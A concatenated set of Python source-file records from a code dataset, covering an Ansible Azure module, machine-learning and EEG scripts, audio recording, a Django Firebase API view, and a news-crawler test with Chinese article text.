sns.despine()\n plt.savefig(self.figure_path / (ts_label + \"_time_series.eps\"), bbox_inches=\"tight\", format=\"eps\")\n\n print(\"Total Training in mins: %5.2f\" % ((time.time() - start_time) / 60))\n","sub_path":"ts/benchmark/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":3914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"87517189","text":"#!/usr/bin/python\r\n#\r\n# Copyright (c) 2020 GuopengLin, (@t-glin)\r\n#\r\n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\r\n\r\nfrom __future__ import absolute_import, division, print_function\r\n__metaclass__ = type\r\n\r\n\r\nANSIBLE_METADATA = {'metadata_version': '1.1',\r\n 'status': ['preview'],\r\n 'supported_by': 'community'}\r\n\r\n\r\nDOCUMENTATION = '''\r\n---\r\nmodule: azure_rm_virtualcluster_info\nversion_added: '2.9'\nshort_description: Get VirtualCluster info.\ndescription:\n - Get info of VirtualCluster.\noptions:\n 
resource_group_name:\n description:\n - >-\n The name of the resource group that contains the resource. You can\n obtain this value from the Azure Resource Manager API or the portal.\n type: str\n virtual_cluster_name:\n description:\n - The name of the virtual cluster.\n type: str\nextends_documentation_fragment:\n - azure\nauthor:\n - GuopengLin (@t-glin)\n\r\n'''\r\n\r\nEXAMPLES = '''\r\n - name: List virtualClusters\r\n azure_rm_virtualcluster_info: \r\n {}\r\n \r\n\r\n - name: List virtual clusters by resource group\r\n azure_rm_virtualcluster_info: \r\n resource_group_name: testrg\r\n \r\n\r\n - name: Get virtual cluster\r\n azure_rm_virtualcluster_info: \r\n resource_group_name: testrg\r\n virtual_cluster_name: vc-subnet1-f769ed71-b3ad-491a-a9d5-26eeceaa6be2\r\n \r\n\r\n'''\r\n\r\nRETURN = '''\r\nvirtual_clusters:\r\n description: >-\r\n A list of dict results where the key is the name of the VirtualCluster and\r\n the values are the facts for that VirtualCluster.\r\n returned: always\r\n type: complex\r\n contains:\r\n value:\r\n description:\r\n - Array of results.\r\n returned: always\r\n type: list\r\n sample: null\r\n contains:\r\n subnet_id:\r\n description:\r\n - Subnet resource ID for the virtual cluster.\r\n returned: always\r\n type: str\r\n sample: null\r\n family:\r\n description:\r\n - >-\r\n If the service has different generations of hardware, for the same\r\n SKU, then that can be captured here.\r\n returned: always\r\n type: str\r\n sample: null\r\n child_resources:\r\n description:\r\n - List of resources in this virtual cluster.\r\n returned: always\r\n type: list\r\n sample: null\r\n next_link:\r\n description:\r\n - Link to retrieve next page of results.\r\n returned: always\r\n type: str\r\n sample: null\r\n location:\r\n description:\r\n - Resource location.\r\n returned: always\r\n type: str\r\n sample: null\r\n tags:\r\n description:\r\n - Resource tags.\r\n returned: always\r\n type: dictionary\r\n sample: null\r\n subnet_id:\r\n description:\r\n - Subnet resource ID for the virtual cluster.\r\n returned: always\r\n type: str\r\n sample: null\r\n family:\r\n description:\r\n - >-\r\n If the service has different generations of hardware, for the same\r\n SKU, then that can be captured here.\r\n returned: always\r\n type: str\r\n sample: null\r\n child_resources:\r\n description:\r\n - List of resources in this virtual cluster.\r\n returned: always\r\n type: list\r\n sample: null\r\n\r\n'''\r\n\r\nimport time\r\nimport json\r\nfrom ansible.module_utils.azure_rm_common import AzureRMModuleBase\r\nfrom copy import deepcopy\r\ntry:\r\n from msrestazure.azure_exceptions import CloudError\r\n from azure.mgmt.sql import SqlManagementClient\r\n from msrestazure.azure_operation import AzureOperationPoller\r\n from msrest.polling import LROPoller\r\nexcept ImportError:\r\n # This is handled in azure_rm_common\r\n pass\r\n\r\n\r\nclass AzureRMVirtualClusterInfo(AzureRMModuleBase):\r\n def __init__(self):\r\n self.module_arg_spec = dict(\r\n resource_group_name=dict(\r\n type='str'\r\n ),\r\n virtual_cluster_name=dict(\r\n type='str'\r\n )\r\n )\r\n\r\n self.resource_group_name = None\r\n self.virtual_cluster_name = None\r\n\r\n self.results = dict(changed=False)\r\n self.mgmt_client = None\r\n self.state = None\r\n self.url = None\r\n self.status_code = [200]\r\n\r\n self.query_parameters = {}\r\n self.query_parameters['api-version'] = '2015-05-01-preview'\r\n self.header_parameters = {}\r\n self.header_parameters['Content-Type'] = 'application/json; 
charset=utf-8'\r\n\r\n self.mgmt_client = None\r\n super(AzureRMVirtualClusterInfo, self).__init__(self.module_arg_spec, supports_tags=True)\r\n\r\n def exec_module(self, **kwargs):\r\n\r\n for key in self.module_arg_spec:\r\n setattr(self, key, kwargs[key])\r\n\r\n self.mgmt_client = self.get_mgmt_svc_client(SqlManagementClient,\r\n base_url=self._cloud_environment.endpoints.resource_manager,\r\n api_version='2015-05-01-preview')\r\n\r\n if (self.resource_group_name is not None and\r\n self.virtual_cluster_name is not None):\r\n self.results['virtual_clusters'] = self.format_item(self.get())\r\n elif (self.resource_group_name is not None):\r\n self.results['virtual_clusters'] = self.format_item(self.listbyresourcegroup())\r\n else:\r\n self.results['virtual_clusters'] = self.format_item(self.list())\r\n return self.results\r\n\r\n def get(self):\r\n response = None\r\n\r\n try:\r\n response = self.mgmt_client.virtual_clusters.get(resource_group_name=self.resource_group_name,\r\n virtual_cluster_name=self.virtual_cluster_name)\r\n except CloudError as e:\r\n self.log('Could not get info for @(Model.ModuleOperationNameUpper).')\r\n\r\n return response\r\n\r\n def listbyresourcegroup(self):\r\n response = None\r\n\r\n try:\r\n response = self.mgmt_client.virtual_clusters.list_by_resource_group(resource_group_name=self.resource_group_name)\r\n except CloudError as e:\r\n self.log('Could not get info for @(Model.ModuleOperationNameUpper).')\r\n\r\n return response\r\n\r\n def list(self):\r\n response = None\r\n\r\n try:\r\n response = self.mgmt_client.virtual_clusters.list()\r\n except CloudError as e:\r\n self.log('Could not get info for @(Model.ModuleOperationNameUpper).')\r\n\r\n return response\r\n\r\n def format_item(self, item):\r\n if hasattr(item, 'as_dict'):\r\n return [item.as_dict()]\r\n else:\r\n result = []\r\n items = list(item)\r\n for tmp in items:\r\n result.append(tmp.as_dict())\r\n return result\r\n\r\n\r\ndef main():\r\n AzureRMVirtualClusterInfo()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"tmp/azure_rm_virtualcluster_info.py","file_name":"azure_rm_virtualcluster_info.py","file_ext":"py","file_size_in_byte":7004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"531863291","text":"import pandas as pd\nimport tensorflow as tf # updated: tensorflow==2.0.0-beta1\nfrom tensorflow.keras.models import Sequential # updated: tensorflow==2.0.0-beta1\nfrom tensorflow.keras.layers import Dense # updated: tensorflow==2.0.0-beta1\nfrom sklearn.model_selection import cross_val_score\nfrom tensorflow.keras.wrappers.scikit_learn import KerasRegressor\nfrom tensorflow.keras import backend as k # updated: tensorflow==2.0.0-beta1\nfrom sklearn import metrics\nimport time\n\ninicio = time.time()\nbase = pd.read_csv('autos.csv', encoding = 'ISO-8859-1')\n\nbase = base.drop('dateCrawled', axis = 1)\nbase = base.drop('dateCreated', axis = 1)\nbase = base.drop('nrOfPictures', axis = 1)\nbase = base.drop('postalCode', axis = 1)\nbase = base.drop('lastSeen', axis = 1)\nbase = base.drop('name', axis = 1)\nbase = base.drop('seller', axis = 1)\nbase = base.drop('offerType', axis = 1)\n\nbase = base[base.price > 10]\nbase = base.loc[base.price < 350000]\n\nvalores = {'vehicleType': 'limousine', 'gearbox': 'manuell',\n 'model': 'golf', 'fuelType': 'benzin',\n 'notRepairedDamage': 'nein'}\nbase = base.fillna(value = valores)\n\nprevisores = base.iloc[:, 1:13].values\npreco_real = base.iloc[:, 0].values\n\nfrom 
sklearn.preprocessing import OneHotEncoder\nfrom sklearn.compose import ColumnTransformer\n\nonehotencoder = ColumnTransformer(transformers=[(\"OneHot\", OneHotEncoder(), [0,1,3,5,8,9,10])],remainder='passthrough')\nprevisores = onehotencoder.fit_transform(previsores).toarray()\n\n\ndef criar_rede(): # updated: tensorflow==2.0.0-beta1\n k.clear_session()\n regressor = Sequential([\n tf.keras.layers.Dense(units=158, activation = 'relu', input_dim=316),\n tf.keras.layers.Dense(units=158, activation = 'relu'),\n tf.keras.layers.Dense(units=1, activation = 'linear')])\n regressor.compile(loss = 'mean_absolute_error', optimizer = 'adam',\n metrics = ['mean_absolute_error'])\n return regressor\n\nregressor = KerasRegressor(build_fn = criar_rede,\n epochs = 100,\n batch_size = 300)\nresultados = cross_val_score(estimator = regressor,\n X = previsores, y = preco_real,\n cv = 10, scoring = 'neg_mean_absolute_error')\nfim = time.time()\nmedia = resultados.mean()\ndesvio = resultados.std()\nprint(fim - inicio)\n ","sub_path":"redes_neurais_artificiais/regressao_um_valor/autos_regressao_cruzada.py","file_name":"autos_regressao_cruzada.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
fmt in zip(\n [SYSTEM1020, SYSTEM1010, SYSTEM1005], [\"1020\", \"1010\", \"1005\"]\n ):\n\n idx = df.label.isin(system)\n system_df = df.loc[idx, :]\n system_df = system_df.sort_values(by=\"label\")\n system_df.to_csv(\n fname_template.format(fmt),\n sep=\"\\t\",\n na_rep=\"n/a\",\n index=False,\n float_format=\"%.4f\",\n )\n\n # Now in 2D using stereographic projection\n xs, ys = stereographic_projection(\n system_df[\"x\"].to_numpy(),\n system_df[\"y\"].to_numpy(),\n system_df[\"z\"].to_numpy(),\n )\n system_df = system_df.loc[:, [\"label\", \"x\", \"y\"]]\n system_df.loc[:, \"x\"] = xs\n system_df.loc[:, \"y\"] = ys\n system_df.to_csv(\n fname_template.format(fmt + \"_2D\"),\n sep=\"\\t\",\n na_rep=\"n/a\",\n index=False,\n float_format=\"%.4f\",\n )\n\n # Plot for each standard system\n # -----------------------------\n system = input(\"Which system do you want to plot? (1020/1010/1005/None)\\n\")\n if system in [\"1020\", \"1010\", \"1005\"]:\n df = pd.read_csv(fname_template.format(system), sep=\"\\t\")\n\n # 3D\n fig, ax = plot_spherical_head()\n\n for idx, row in df.iterrows():\n ax.scatter3D(row.x, row.y, row.z, c=\"b\")\n ax.text(row.x, row.y, row.z, row[\"label\"], fontsize=5)\n\n ax.set_title(\"standard_{}\".format(system))\n\n # 2D\n fig2, ax2 = plot_2d_head()\n\n xs, ys = stereographic_projection(df[\"x\"], df[\"y\"], df[\"z\"])\n\n ax2.scatter(xs, ys, marker=\".\", color=\"r\")\n\n for lab, x, y in zip(list(df[\"label\"]), xs, ys):\n ax2.annotate(lab, xy=(x, y), fontsize=5)\n\n ax2.set_title(\"standard_{}\".format(system))\n\n # Show and wait until done\n fig.show()\n fig2.show()\n done = input(\"\\nClick Enter when finished viewing.\\n\")\n","sub_path":"eeg_positions/calc_positions.py","file_name":"calc_positions.py","file_ext":"py","file_size_in_byte":4379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"262293714","text":"import pyaudio\nimport wave\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nRESPEAKER_RATE = 16000\nRESPEAKER_CHANNELS = 6 # change base on firmwares, 1_channel_firmware.bin as 1 or 6_channels_firmware.bin as 6\nRESPEAKER_WIDTH = 2\n# run getDeviceInfo.py to get index\nRESPEAKER_INDEX = 4 # refer to input device id\nCHUNK = 1024\nRECORD_SECONDS = 1.2\n\nWAVE_OUTPUT_FILENAME = \"output.wav\"\np = pyaudio.PyAudio()\n\nstream = p.open(\n rate=RESPEAKER_RATE,\n format=p.get_format_from_width(RESPEAKER_WIDTH),\n channels=RESPEAKER_CHANNELS,\n input=True,\n input_device_index=RESPEAKER_INDEX,)\n\nprint(\"* recording\")\n\nframes = []\n\nfor i in range(0, int(RESPEAKER_RATE / CHUNK * RECORD_SECONDS)):\n data = stream.read(CHUNK)\n frames.append(data)\n # Do dome thing with the chunk data, run any speech processing on-the-fly\n d = np.fromstring(data, dtype=np.int16)\n np.save(str('o_all'), d)\n ch0 = d[np.arange(0, CHUNK, 6)]\n ch1 = d[np.arange(1, CHUNK, 6)]\n ch2 = d[np.arange(2, CHUNK, 6)]\n ch3 = d[np.arange(3, CHUNK, 6)]\n ch4 = d[np.arange(4, CHUNK, 6)]\n ch5 = d[np.arange(5, CHUNK, 6)]\n\n\nprint(\"* done recording\")\n\nstream.stop_stream()\nstream.close()\np.terminate()\n\nwf = wave.open(WAVE_OUTPUT_FILENAME, 'wb')\nwf.setnchannels(RESPEAKER_CHANNELS)\nwf.setsampwidth(p.get_sample_size(p.get_format_from_width(RESPEAKER_WIDTH)))\nwf.setframerate(RESPEAKER_RATE)\nwf.writeframes(b''.join(frames))\nwf.close()\n","sub_path":"record.py","file_name":"record.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 
+{"seq_id":"119448555","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.views.generic import View\nfrom django.http import HttpResponse, JsonResponse\n# from django.shortcuts import render\n\nfrom firebasedb.models import FirebaseDB\nimport logging\nimport google.oauth2.id_token\n\nlogger = logging.getLogger(__name__)\n\nHTTP_REQUEST = google.auth.transport.requests.Request()\n\n\nclass EchoAPI(View):\n\n def get(self, request, *args, **kwargs):\n return HttpResponse('OK')\n\n\nclass DemoMessagesAPI(View):\n\n def get(self, request, *args, **kwargs):\n\n logger.debug('request.META keys: %s' % str(request.META.keys()))\n logger.debug('request.META authorization value %s' % str(request.META.get('HTTP_AUTHORIZATION')))\n id_token = request.META.get('HTTP_AUTHORIZATION').split(' ').pop()\n logger.debug('DemoMessagesAPI get id_token %s' % id_token)\n\n claims = google.oauth2.id_token.verify_firebase_token(\n id_token, HTTP_REQUEST)\n if not claims:\n return HttpResponse('Unauthorized', status=401)\n else:\n logger.debug('claims: %s' % str(claims))\n\n friendly_id = claims.get('name', claims.get('email', 'Unknown'))\n\n firebase_db = FirebaseDB()\n pi_serial_list = firebase_db.get_dev_serial_list()\n demo_notes = []\n if pi_serial_list:\n for pi_serial in pi_serial_list:\n demo_notes.append({\n 'friendly_id': friendly_id,\n 'message': pi_serial,\n 'created': ''\n })\n\n response = JsonResponse(demo_notes,safe=False)\n # response[\"Access-Control-Allow-Origin\"] = \"*\"\n # response[\"Access-Control-Allow-Methods\"] = \"GET, OPTIONS\"\n # response[\"Access-Control-Max-Age\"] = \"1000\"\n # response[\"Access-Control-Allow-Headers\"] = \"X-Requested-With, Content-Type\"\n\n return response","sub_path":"appengine/backend_api/firenotes/apis.py","file_name":"apis.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"627804578","text":"# Copyright (c) Facebook, Inc. and its affiliates. 
All Rights Reserved.\nimport torch\nfrom torch import nn\n\nfrom maskrcnn_benchmark.structures.bounding_box import BoxList\n\n\n# object\nclass TransPostProcessor(nn.Module):\n    \"\"\"\n    From the results of the CNN, post process the masks\n    by taking the mask corresponding to the class with max\n    probability (which are of fixed size and directly output\n    by the CNN) and return the masks in the mask field of the BoxList.\n\n    If a masker object is passed, it will additionally\n    project the masks in the image according to the locations in boxes,\n    \"\"\"\n\n    def __init__(self, cfg):\n        super(TransPostProcessor, self).__init__()\n        self.cfg = cfg.clone()\n\n    def forward(self, trans_pred, boxes):\n        \"\"\"\n        Arguments:\n            x (Tensor): the mask logits\n            boxes (list[BoxList]): bounding boxes that are used as\n                reference, one for ech image\n\n        Returns:\n            results (list[BoxList]): one BoxList for each image, containing\n                the extra field mask\n        \"\"\"\n        boxes_per_image = [len(box) for box in boxes]\n        trans_pred = trans_pred.split(boxes_per_image, dim=0)\n\n        results = []\n        for trans, box in zip(trans_pred, boxes):\n            bbox = BoxList(box.bbox, box.size, mode=\"xyxy\")\n            for field in box.fields():\n                bbox.add_field(field, box.get_field(field))\n            bbox.add_field(\"trans_pred\", trans)\n            results.append(bbox)\n\n        return results\n\n\ndef make_roi_trans_post_processor(cfg):\n    trans_post_processor = TransPostProcessor(cfg)\n    return trans_post_processor\n","sub_path":"maskrcnn_benchmark/modeling/roi_heads/trans_head/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"399823620","text":"import pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport argparse\n\n\ndef main(demo_file,\n         inmates_file):\n    demographics = pd.read_csv(demo_file)\n    inmates = pd.read_csv(inmates_file)\n    \n    \ndef dist_plots(inmates_file):\n    grid = sns.FacetGrid(inmates.dropna(subset=['RACE']), col='RACE', col_wrap=3, hue = 'RACE', palette=sns.color_palette('deep', 6))\n    grid.map(sns.distplot, 'length_incarcerated')\n    \ndef pie_charts(demo_file):\n    return()\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"--inmates_file\", help=\"Path to inmates file\")\n    parser.add_argument(\"--demo_file\", help=\"Path to demographics file\")\n    parser.add_argument(\"--output_directory\", help=\"Path to output demographics\")","sub_path":"generate_visualizations/src/.ipynb_checkpoints/gen_visuals-checkpoint.py","file_name":"gen_visuals-checkpoint.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"263166671","text":"from pathlib import Path\nimport pandas as pd\nimport numpy as np\nimport sys, os\nimport joblib\n\nDIR = Path(\"/media/zquantz/0236e42e-4d80-45cf-b1f7-f12ee259facd/StockAlgoData/\")\n\ntickers = os.listdir(DIR/\"PriceData\")\ntickers = [ticker[:-4] for ticker in tickers]\ntickers = sorted(tickers)\n\ncs = 1000\nchunks = [tickers[i - cs : i ] for i in range(cs, len(tickers) + cs, cs)]\n\nts = {}\nc_min = \"1950-01-01\"\nc_max = \"2020-01-01\"\n\ndates = pd.date_range(c_min, c_max).astype(str)\nfor date in dates:\n\tts[date] = np.array([0]*len(tickers))\n\ndef process(chunk):\n\n\tmain = []\n\tidc = [tickers.index(ticker) for ticker in chunk]\n\tfor ticker in chunk:\n\n\t\tdf = pd.read_csv(DIR/\"PriceData\"/(ticker+'.csv'))\n\t\tdf = 
df.sort_values(\"DATE\").reset_index()\n\t\tdf['MktCap'] = df.ADJ_VOLUME * df.ADJ_CLOSE\n\t\tdf = df[['DATE', 'MktCap']].set_index('DATE')\n\t\tdf.columns = [ticker]\n\t\tmain.append(df)\n\n\tmain = pd.concat(main, sort=True, axis=1).fillna(0)\n\tmain = main.rolling(200, min_periods=1).max()\n\n\tfor date, row in zip(main.index, main.values):\n\t\tts[date][idc] = row\n\nif __name__ == '__main__':\n\n\tfor chunk in chunks:\n\t\tprocess(chunk)\n\n\twith open(DIR/\"approx_market_cap_timeseries.pkl\", 'wb') as file:\n\t\tjoblib.dump(tickers, file)\n","sub_path":"data_scripts/get_approx_marketcap_timeseries.py","file_name":"get_approx_marketcap_timeseries.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"43795873","text":"import unittest, sys, os, re\nfrom warnings import warn\n\nroot_dir=os.path.abspath(os.path.join(os.path.dirname(__file__),'..','..','..'))\nsys.path.append(os.path.join(root_dir, 'lib'))\nfrom Pipeline.run_cmd import RunCmd\nfrom Pipeline.Pipeline import Pipeline\nfrom Pipeline.host import Host\nfrom writer_cmd import writer_cmd\n\nhost_conf=os.path.join(root_dir, 'config', 'hosts.conf')\nhost=Host(host_conf, 'clutch')\nworking_dir=os.path.dirname(__file__) or os.path.abspath('.')\n\nclass TestBasic(unittest.TestCase):\n \n def setUp(self):\n pass\n\n def test_simplest(self):\n pipeline=Pipeline('mock', host, working_dir)\n cmd=writer_cmd('writer', pipeline)\n cmd.run()\n\n with open(cmd._get_stdout()) as f:\n contents=f.read()\n expected='this goes to stdout\\n'\n self.assertEqual(contents, expected)\n\n with open(cmd._get_stderr()) as f:\n contents=f.read()\n expected='this goes to stderr\\n'\n self.assertEqual(contents, expected)\n\n os.unlink(cmd._get_stdout())\n os.unlink(cmd._get_stderr())\n\n\n def _test_bowtie2(self):\n pipeline=Pipeline('mock', host, working_dir)\n data_basename='1047-COPD.10K'\n ref_index='hg19'\n bt2=RunBowtie2(pipeline, data_basename, ref_index)\n bt2.run()\n\nif __name__ == '__main__':\n suite = unittest.TestLoader().loadTestsFromTestCase(TestBasic)\n unittest.TextTestRunner(verbosity=2).run(suite)\n\n","sub_path":"t/pipeline/run_cmd/redirection.py","file_name":"redirection.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"365393354","text":"\r\nimport turtle\r\n\r\ndef eighthGradeMath():\r\n\r\n faster = int(input(\"How fast? 1-10, 1 is slow, 10 is fast: \"))\r\n\r\n turtle.speed(faster)\r\n\r\n size = float(input(\"What size would you like? (Recommended 45): \"))\r\n\r\n pixel = int(input(\"How detailed would you like it? (Pixel separation; \" +\r\n \"10 is recommended. 
Smaller numbers give more detail.): \"))\r\n \r\n x = size * 10\r\n b = 0\r\n d = 0\r\n f = 0\r\n h = 0\r\n \r\n\r\n # 1st drawn quadrant (math quadrant I, 0-90)\r\n a = 0\r\n b += x\r\n count = 0\r\n while count <= size:\r\n\r\n turtle.setpos(0, b)\r\n turtle.goto(a, 0)\r\n\r\n a += pixel\r\n b -= pixel\r\n \r\n count += 1\r\n\r\n turtle.setpos(0, 0)\r\n\r\n # 2nd drawn quadrant (math quadrant IV, 270-360)\r\n c = 0\r\n d = -x\r\n count = 0\r\n while count <= size:\r\n\r\n turtle.setpos(0, d)\r\n turtle.goto(c, 0)\r\n\r\n c += pixel\r\n d += pixel \r\n\r\n count += 1\r\n \r\n turtle.setpos(0, 0)\r\n\r\n # 3rd drawn quadrant (math quadrant III, 180-270)\r\n e = 0\r\n f = -x\r\n count = 0\r\n \r\n while count <= size:\r\n\r\n turtle.setpos(0, f)\r\n turtle.goto(e, 0) \r\n\r\n e -= pixel\r\n f += pixel\r\n\r\n count += 1\r\n \r\n turtle.setpos(0, 0)\r\n \r\n # 4th drawn quadrant (math quadrant II, 90-180) \r\n g = 0\r\n h = x\r\n count = 0\r\n while count <= size:\r\n\r\n turtle.setpos(0, h)\r\n turtle.goto(g, 0)\r\n\r\n g -= pixel\r\n h -= pixel\r\n\r\n count += 1\r\n \r\n turtle.setpos(0, 0)\r\n\r\n\r\nagain = 'y'\r\n\r\nwhile again == 'y' or 'Y': \r\n\r\n eighthGradeMath()\r\n\r\n reset = input(\"Clear the screen? Hit y for yes and press Enter: \")\r\n\r\n if reset == 'y' or reset == 'Y':\r\n turtle.reset()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Eighth_Grade_Math turtle_code_v.2.0.py","file_name":"Eighth_Grade_Math turtle_code_v.2.0.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"165591592","text":"#!/usr/bin/python3 -u\n# -*- coding: utf-8 -*-\n#############################################################################\n# weather_kidsroom.py #\n# Monitor temperature and humidity in our kid's room. 
#\n# (c) https://github.com/thomaspfeiffer-git 2015, 2016, 2017 #\n#############################################################################\n\"\"\"Monitor temperature and humidity in our kid's room.\"\"\"\n\n# Start with:\n# nohup sudo ./weather_kidsroom.py > /dev/null &\n\nimport datetime\nimport subprocess\nimport sys\nfrom time import strftime, localtime, sleep, time\n\nsys.path.append('../libs')\nsys.path.append('../libs/sensors')\nfrom CPU import CPU\nfrom DHT22_AM2302 import DHT22_AM2302\nfrom Measurements import Measurements\nfrom SensorQueue2 import SensorQueueClient_write\nfrom SensorValue2 import SensorValue, SensorValue_Data\nfrom Shutdown import Shutdown\n\nDHT22_AM2302_PIN = 35\n\n\n# Misc for rrdtool\nRRDFILE = \"/schild/weather/weather_kidsroom.rrd\"\nDS_TEMP1 = \"kidsroom_temp1\"\nDS_TEMPCPU = \"kidsroom_tempcpu\"\nDS_TEMP2 = \"kidsroom_temp2\"\nDS_HUMI = \"kidsroom_humi\"\n\n\n\n###############################################################################\n# Main ########################################################################\ndef main():\n \"\"\"main part\"\"\"\n sq = SensorQueueClient_write(\"../../configs/weatherqueue.ini\")\n qvalue_temp = SensorValue(\"ID_06\", \"TempKinderzimmer\", SensorValue_Data.Types.Temp, \"°C\")\n qvalue_humi = SensorValue(\"ID_07\", \"HumiKinderzimmer\", SensorValue_Data.Types.Humi, \"% rF\")\n sq.register(qvalue_temp)\n sq.register(qvalue_humi)\n\n temphumi = DHT22_AM2302(19, qvalue_temp, qvalue_humi) # BCM 19 = PIN 35\n temp_cpu = CPU()\n\n measurements = {DS_TEMP1: Measurements(3), \\\n DS_TEMPCPU: Measurements(3), \\\n DS_TEMP2: Measurements(3), \\\n DS_HUMI: Measurements(3)}\n\n rrd_template = DS_TEMP1 + \":\" + \\\n DS_TEMPCPU + \":\" + \\\n DS_TEMP2 + \":\" + \\\n DS_HUMI\n\n\n while (True):\n _temp, _humi = temphumi.read()\n measurements[DS_TEMP1].append(_temp)\n measurements[DS_HUMI].append(_humi)\n measurements[DS_TEMPCPU].append(temp_cpu.read_temperature())\n measurements[DS_TEMP2].append(0) # empty, for later useage\n\n rrd_data = \"N:{:.2f}\".format(measurements[DS_TEMP1].last()) + \\\n \":{:.2f}\".format(measurements[DS_TEMPCPU].last()) + \\\n \":{:.2f}\".format(measurements[DS_TEMP2].last()) + \\\n \":{:.2f}\".format(measurements[DS_HUMI].last())\n # print(strftime(\"%H:%M:%S\", localtime()), rrd_data)\n # rrdtool.update(RRDFILE, \"--template\", rrd_template, rrd_data)\n\n # python rrdtool seems not to work here; the pi needs a proper reinstall.\n # as a workaround, i just call the os for rrd update\n # rrd = \"/usr/bin/rrdtool update {} --template {} {}\".format(RRDFILE, rrd_template, rrd_data)\n rrd = [\"/usr/bin/rrdtool\", \"update\", RRDFILE, \"--template\", rrd_template, rrd_data]\n print(rrd)\n subprocess.call(rrd)\n\n sleep(35)\n\n###############################################################################\n# Exit ########################################################################\ndef shutdown_application ():\n \"\"\"cleanup stuff\"\"\"\n sys.exit(0)\n\n\n\n###############################################################################\n###############################################################################\nif __name__ == '__main__':\n shutdown = Shutdown(shutdown_func=shutdown_application)\n\n main()\n\n### eof ###\n\n","sub_path":"weather/weather_kidsroom.py","file_name":"weather_kidsroom.py","file_ext":"py","file_size_in_byte":3748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"646003758","text":"from setuptools import 
setup,find_packages\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetup(\n name='mrlog',\n version='0.0.1',\n author='luohuaizhi',\n author_email='luohuaizhi1484@163.com',\n description='record some operate information to db(mongo) at flask running',\n long_description=long_description,\n url='https://github.com/luohuaizhi/record_log',\n #packages=[\"flask\", \"pymongo\"],\n packages=find_packages(),\n classifiers=[\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python',\n 'Intended Audience :: Developers',\n 'Operating System :: OS Independent',\n ]\n)\n","sub_path":"pypi_install_script/mrlog-0.0.1.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"456245121","text":"# encoding=utf-8\n# Author: Yu-Lun Chiang\n# Description: Test NewsCrawler\n\nimport logging\nimport pytest\nfrom collections import namedtuple\nfrom Sanga.media import bcc\nfrom Sanga.struct import NewsStruct\n\nlogger = logging.getLogger(__name__)\n\n\nTEST_DATA = namedtuple(\n typename=\"TEST_DATA\",\n field_names=[\n \"name\",\n \"link\",\n \"expected_output\",\n ],\n)\n\nTEST_DATA_1 = TEST_DATA(\n name=\"中國廣播公司_1\",\n link=\"https://www.bcc.com.tw/newsView.6473942\",\n expected_output=NewsStruct(\n title=\"「這家超商」6/23開賣快篩試劑 雙北2門市限量100盒\",\n content=\"\\r\\n 為了方便民眾居家檢測新冠肺炎,食藥署在19日公布核准5款家用快篩試劑,可就近到藥局、醫療器材販售業者,如藥妝店、醫療器材行、便利商店等商家選購。萊爾富位於雙北的2家門市明(23)日起將首度開賣家用快篩試劑,每店限量100盒,售完為止。萊爾富首度引進國產泰博科技的「福爾威創家用新型冠狀病毒抗原快速檢驗套組」,明天下午3點起,將在台北市迪化店、北縣五工店限量開賣,每盒5入售價1700元,每店限量100盒,不拆售。根據食藥署公布的指引,如果快篩陽性,居家檢疫或隔離者須先與衛生單位聯繫,一般民眾則到社區採檢院所採檢確認;如果是陰性,民眾仍要遵循防疫規範,做好個人防護,持續自我健康管理。(快篩試劑資料照)\\r\\n \",\n keywords=None,\n category=None,\n media=\"中國廣播公司\",\n datetime=\"2021/06/22 18:49 報導\",\n link=\"https://www.bcc.com.tw/newsView.6473942\",\n ),\n)\n\nTEST_DATA_2 = TEST_DATA(\n name=\"中國廣播公司_2\",\n link=\"https://www.bcc.com.tw/newsView.4839712\",\n expected_output=NewsStruct(\n title=\"台積電衝關未成 聯電ADR爆漲股價再登新高\",\n content=\"\\r\\n 